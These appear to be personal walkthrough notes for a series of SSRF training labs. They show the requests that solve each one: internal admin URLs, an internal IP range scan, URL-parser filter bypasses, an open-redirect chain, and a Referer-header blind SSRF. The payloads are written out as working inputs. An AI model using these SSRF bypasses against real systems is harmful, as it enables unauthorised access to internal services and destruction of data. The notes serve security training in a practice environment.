labs

This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.
change the stockApi value to http://localhost/admin/ and return a page that contains a link to delete the user carlos
http://localhost/admin/delete?username=carlos

POST /product/stock HTTP/1.1
...
stockApi=http%3a%2f%2flocalhost%2fadmin%2fdelete%3fusername%3dcarlos

This lab has a stock check feature which fetches data from an internal system. To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos.
the SSRF vuln end point is at

POST /product/stock HTTP/1.1
...
stockApi=http://192.168.0.1:8080/product/stock/check?productId=1&storeId=1

This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos. The developer has deployed two weak anti-SSRF defenses that you will need to bypass.
the SSRF vuln end point is at

POST /product/stock HTTP/1.1
...
stockApi=http://192.168.0.1:8080/product/stock/check?productId=1&storeId=1

This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos. The developer has deployed an anti-SSRF defense you will need to bypass.
at the SSRF vuln end point,
try to change the value of stockApi value
http://localhost and return 400 response with "External stock check host must be stock.weliketoshop.net"
try
- http://stock.weliketoshop.net@localhost
- http://localhost#stock.weliketoshop.net
- http://stock.weliketoshop.net.localhost not working
http://localhost@stock.weliketoshop.net => get 500 server error
http://localhost#@stock.weliketoshop.net not working
http://localhost%23@stock.weliketoshop.net works again
http://localhost%23@stock.weliketoshop.net/admin works
http://localhost:80%23@stock.weliketoshop.net/admin/delete?username=carlos

This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://192.168.0.12:8080/admin and delete the user carlos. The stock checker has been restricted to only access the local application, so you will need to find an open redirect affecting the application first.
first find the Open redirect vuln
Redirection is found at Next Product button
Open redirect is found

GET /product/nextProduct?currentProductId=1&path=http://example.com HTTP/1.1

stockApi=/product/nextProduct?currentProductId=1&path=http://192.168.0.12:8080/admin/delete?username=carlos

This site uses analytics software which fetches the URL specified in the Referer header when a product page is loaded. To solve the lab, use this functionality to cause an HTTP request to the public Burp Collaborator server.
change the Referer header in one of the GET request page of a product to Burp Collaborator client

This site uses analytics software which fetches the URL specified in the Referer header when a product page is loaded. To solve the lab, use this functionality to perform a blind SSRF attack against an internal server in the 192.168.0.X range on port 8080. In the blind attack, use a Shellshock payload against the internal server to exfiltrate the name of the OS user.

Last updated 3 years ago